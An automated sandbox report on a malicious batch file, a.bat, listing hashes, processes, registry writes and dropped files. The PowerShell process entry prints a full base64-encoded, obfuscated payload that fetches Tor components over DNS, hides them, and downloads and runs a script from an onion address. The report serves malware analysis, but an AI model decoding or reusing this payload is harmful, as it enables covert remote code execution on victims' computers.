analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

a.bat

Full analysis: https://app.any.run/tasks/0e60f187-f125-4c35-a565-ee23943052c3
Verdict: Malicious activity
Analysis date: February 19, 2019, 12:23:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

D5D5BE150046B5FE3CBE920F319FF83B

SHA1:

BBE675B052986AC8E099D0CA1010284457E6E4F5

SHA256:

A9FA5263C00A4F98C3AEB5F5DD7937CD39EEA3FC460648A09FE867C4E0711568

SSDEEP:

192:a+DzpxJaCkP/WZ6LP0qdZsq7l13z2Iv25wzZ:a+DF/x6ASZ/Z1KIv25w9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3648)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2500)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
32
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3648cmd /c ""C:\Users\admin\AppData\Local\Temp\a.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2500powershell.exe -encodedcommandJwBjAG0AbQAnADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwA7ACcAZgBNAEgARwBDAFMAJwA7ACcAYQB1AEUAJwA7ACQAYwBuAGEAIAA9ACAAKABnAGUAdAAtAHcAbQBpAG8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAFAAcgBvAGQAdQBjAHQAKQAuAFUAVQBJAEQAOwAnAEYATgBkACcAOwAnAGsATwBjAGgAdgByAGoATAAnADsAaQBmACAAKAAoAGcAcAAgAEgASwBDAFUAOgBcAFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AKQAgAC0AbQBhAHQAYwBoACAAJABjAG4AYQApAHsAOwAnAGMAeQBqAGEAVQBYAFAAcAAnADsAJwB0AG0AZwBQAGoAVwBCAGsAZgBPACcAOwAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABwAGkAZAApAC4ASwBpAGwAbAAoACkAOwAnAGgAagBJAFkATABXAHMAZwBiAG8ARAAnADsAJwBGAFIAUwAnADsAfQA7ACcASQBzAFQAcwBwAHIARABTAEkAQgAnADsAJwBPAHIAYQBBAHAAVgBkAFUAYwBQAHoAJwA7AGYAdQBuAGMAdABpAG8AbgAgAGUAKAAkAG4AcwApAHsAOwAnAGwAagAnADsAJwBGAEMAaABBAEkAeAAnADsAJABvAHcAdwAgAD0AIAAoACgAKABpAGUAeAAgACIAbgBzAGwAbwBvAGsAdQBwACAALQBxAHUAZQByAHkAdAB5AHAAZQA9AHQAeAB0ACAAJABuAHMAIAA4AC4AOAAuADgALgA4ACIAKQAgAC0AbQBhAHQAYwBoACAAJwAiACcAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcAIgAnACwAIAAnACcAKQBbADAAXQAuAFQAcgBpAG0AKAApADsAJwBJAFkAcgB4AHQAbgAnADsAJwB0AHgAZQBSAEUATgBOAHkATQBiAE4AJwA7ACQAeQBnAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAG8AdwB3ACwAIAAkAGUAaABvACkAOwAnAE4AUABxAGsAJwA7ACcAaABEAHIAcABtAHMAdQAnADsAJABoAHIAeQBuACAAPQAgACQAYwBxAHYALgBOAGEAbQBlAFMAcABhAGMAZQAoACQAZQBoAG8AKQAuAEkAdABlAG0AcwAoACkAOwAnAEEAaABYAG4AagAnADsAJwB6AHQAQQAnADsAJABjAHEAdgAuAE4AYQBtAGUAUwBwAGEAYwBlACgAJABnAHUAZABxACkALgBDAG8AcAB5AEgAZQByAGUAKAAkAGgAcgB5AG4ALAAgADIAMAApADsAJwBqAEgAQQBjAHcAVQBRAHMAJwA7ACcAcABBAGoATgBGAFcAJwA7AHIAZAAgACQAZQBoAG8AOwAnAEcARwBrAEkAbgBsAFUAYwAnADsAJwB4AG0AYwBqAGcAJwA7AH0AOwAnAEQASABqAEgAdwBXACcAOwAnAGUAeABkAEQATABJAHEAWgAnADsAJwB6AGcAdgBpAFcATwB6AGcAbwBsAHIAJwA7ACcAZwBaAHQAWABuAEsAeQBZAGIAdQBiACcAOwAnAGoAWABzAHkAdwBaAFoAUAAnADsAJwBlAFcAcgBCAHMAbAB5AEMAaQAnADsAJABnAHUAZABxACAAPQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAnACAAKwAgACQAYwBuAGEAOwAnAFkARwBUAHQAZQBuAGwARQBlAFUAJwA7ACcAbgBUAGcAVwBLAHIARgAnADsAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGcAdQBkAHEAKQApAHsAOwAnAFQAZABuAHoAZQBFAHYAJwA7ACcAcgBqACcAOwAkAHcAeQBiAGYAIAA9ACAATgBlAHcALQBJAHQAZQBtACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQAgAC0ARgBvAHIAYwBlACAALQBQAGEAdABoACAAJABnAHUAZABxADsAJwBvAGQAbABuAGkAJwA7ACcAQgB4AEEAJwA7ACQAdwB5AGIAZgAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAIgBIAGkAZABkAGUAbgAiACwAIAAiAFMAeQBzAHQAZQBtACIALAAgACIATgBvAHQAQwBvAG4AdABlAG4AdABJAG4AZABlAHgAZQBkACIAOwAnAEEAUgBuAHoAZwBwAGwAJwA7ACcAQQBwAHYASQB5AEgARQBCACcAOwB9ADsAJwBLAG0AdwBjAFkAaABLAFQAVQAnADsAJwBwAE8AegBIAEkAeQBoACcAOwAnAHEAegBjAGQAVQBVAGUAdgAnADsAJwB0AGEAeABEAEkAZgBWAHAAYwBBACcAOwAkAGcAZQBhAD0AJABnAHUAZABxACsAIAAnAFwAdABvAHIALgBlAHgAZQAnADsAJwBKAEMARABlAFAASABDAEYAJwA7ACcAUQBuAE4AcwBvAGkAbwBqAHkAUwB3ACcAOwAkAHQAbwA9ACQAZwB1AGQAcQArACAAJwBcAHAAbwBsAGkAcABvAC4AZQB4AGUAJwA7ACcAbQBLAE4AWQBjAGIAcAB3AFYASwBsACcAOwAnAGoASABNACcAOwAkAGUAaABvAD0AJABnAHUAZABxACsAJwBcACcAKwAkAGMAbgBhACsAJwAuAHoAaQBwACcAOwAnAHoAZQBRAHEATQBnAE0AZABnAGwAJwA7ACcAbgBSAE0AVQBXACcAOwAkAHkAZwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAnAEoAUwBDAGQAQQBJAGsAbgAnADsAJwBvAEMAcQBGAE4AeQBMACcAOwAkAGMAcQB2AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgA7ACcAYwBQAHQASgBpAFgAQgBrAFkAJwA7ACcAZgBxAFEAYQAnADsAJwBhAG4AQwBBAHkAVgBqAEIAaQBKACcAOwAnAFUAYgBGAEgAeQBjAHEAcQB4AEQAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAGUAYQApACAALQBvAHIAIAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAHQAbwApACkAewA7ACcAdgBUAGYATwBzAFoAdAB6AHgAZgAnADsAJwBxAFoAQQBkAFgARQBqAGYAUAAnADsAZQAgACcAaQAuAHYAYQBuAGsAaQBuAC4AZABlACcAOwAnAGQAUQBTAHkAYwAnADsAJwBrAGUAUgBXAE0ATwBmAEoAZgB4AGoAJwA7AH0AOwAnAHIAawBjAFMAbgB3AEwAYwBZAHAAQwAnADsAJwB5AFkAWQAnADsAJwBkAHoAUABvAFcAeQBTAEgAJwA7ACcARQBUAFAAcQBkAEgAagBEAEoAUwAnADsAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGcAZQBhACkAIAAtAG8AcgAgACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdABvACkAKQB7ADsAJwBFAGkAQQAnADsAJwBuAFcAbgBGAEMAQwAnADsAZQAgACcAZwBnAC4AaQBiAGkAegAuAGMAYwAnADsAJwBzAHEAUAB1AGYARgB6AHMARABUACcAOwAnAHYAcwBIAFYAcAAnADsAfQA7ACcAbwBZAEIAVgBrACcAOwAnAEIAegBtAFQAYwAnADsAJwBUAFQAWgBmAG0ASgAnADsAJwBVAEcARABwAFYARwBvAGoARwBFAEcAJwA7ACQAbwBvAHkAPQAkAGcAdQBkAHEAKwAnAFwAcgBvAGEAbQBpAG4AZwBsAG8AZwAnADsAJwBBAEMAbQBiAEMAJwA7ACcASwBCAEwAegAnADsAcwBhAHAAcwAgACQAZwBlAGEAIAAtAEEAcgAgACIAIAAtAC0ATABvAGcAIABgACIAbgBvAHQAaQBjAGUAIABmAGkAbABlACAAJABvAG8AeQBgACIAIgAgAC0AdwBpACAASABpAGQAZABlAG4AOwAnAGEARQBYAFIARwBXAFcAdABjAFkAJwA7ACcAZwBPAGQATwAnADsAZABvAHsAcwBsAGUAZQBwACAAMQA7ACQAYwBqAGwAPQBnAGMAIAAkAG8AbwB5AH0AdwBoAGkAbABlACgAIQAoACQAYwBqAGwAIAAtAG0AYQB0AGMAaAAgACcAQgBvAG8AdABzAHQAcgBhAHAAcABlAGQAIAAxADAAMAAlADoAIABEAG8AbgBlAC4AJwApACkAOwAnAGMAQwBYAHUAUgBnACcAOwAnAFEAUwBXAG0AVQBKAHIAZwBqACcAOwBzAGEAcABzACAAJAB0AG8AIAAtAGEAIAAiAHMAbwBjAGsAcwBQAGEAcgBlAG4AdABQAHIAbwB4AHkAPQBsAG8AYwBhAGwAaABvAHMAdAA6ADkAMAA1ADAAIgAgAC0AdwBpACAASABpAGQAZABlAG4AOwAnAFMAQQAnADsAJwB1AEYATQBhAHYASQBlAEsAdgAnADsAcwBsAGUAZQBwACAANwA7ACcAUgBBAFYAeQBrAGcAcABvACcAOwAnAGYATQBLAEwAagB0ACcAOwAkAGsAbABxAHMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQAoACIAbABvAGMAYQBsAGgAbwBzAHQAOgA4ADEAMgAzACIAKQA7ACcAZgBDAEMAJwA7ACcASQBTAHEASwBOAGUAdQBrAGEAZwBDACcAOwAkAGsAbABxAHMALgB1AHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwAnAFgAWQBiAHoAYQBDAHkAWQBDAE0AJwA7ACcASgBUAGEAWgAnADsAJAB5AGcALgBwAHIAbwB4AHkAPQAkAGsAbABxAHMAOwAnAHYAUgB4ACcAOwAnAE0AZgB6AFgAVgBEAE4AWQBTAEsASgAnADsAJABmAHkAawBkAD0AJwBoAHQAdABwADoALwAvAHAAbwB3AGUAcgB3AG8AcgBtAGoAcQBqADQAMgBoAHUALgBvAG4AaQBvAG4ALwBnAGUAdAAuAHAAaABwAD8AcwA9AHMAZQB0AHUAcAAmAG0AbwBtAD0AOABCAEUARQA5ADIAQQAyAC0AQgBBADcARAAtADUAMgA1ADgALQBFAEQARQA5AC0AQwA3ADEARQA4ADAARABBAEUANQBFADMAJgB1AGkAZAA9ACcAIAArACAAJABjAG4AYQA7ACcAdAB2AHcAbwBUAGEAYgBwAHkAJwA7ACcAUgBqAEwAYgAnADsAdwBoAGkAbABlACgAIQAkAG8AbgApAHsAJABvAG4APQAkAHkAZwAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACQAZgB5AGsAZAApAH0AOwAnAE4AZwBnACcAOwAnAHgAagAnADsAaQBmACAAKAAkAG8AbgAgAC0AbgBlACAAJwBuAG8AbgBlACcAKQB7ADsAJwBHAGoAYQBwAEgAVQBaACcAOwAnAEMAVgAnADsAaQBlAHgAIAAkAG8AbgA7ACcATABJAFYAbABRAE0AcwBQAEIAUQBnACcAOwAnAFkATgAnADsAfQA7ACcAaQBVAFgASwBHAGEASwBlAEcAcQBYACcAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
236
Read events
181
Write events
55
Delete events
0

Modification events

(PID) Process:(2500) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J0ZVTENP62Y1178FPGR8.temp
MD5:
SHA256:
2500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19862e.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
a.bat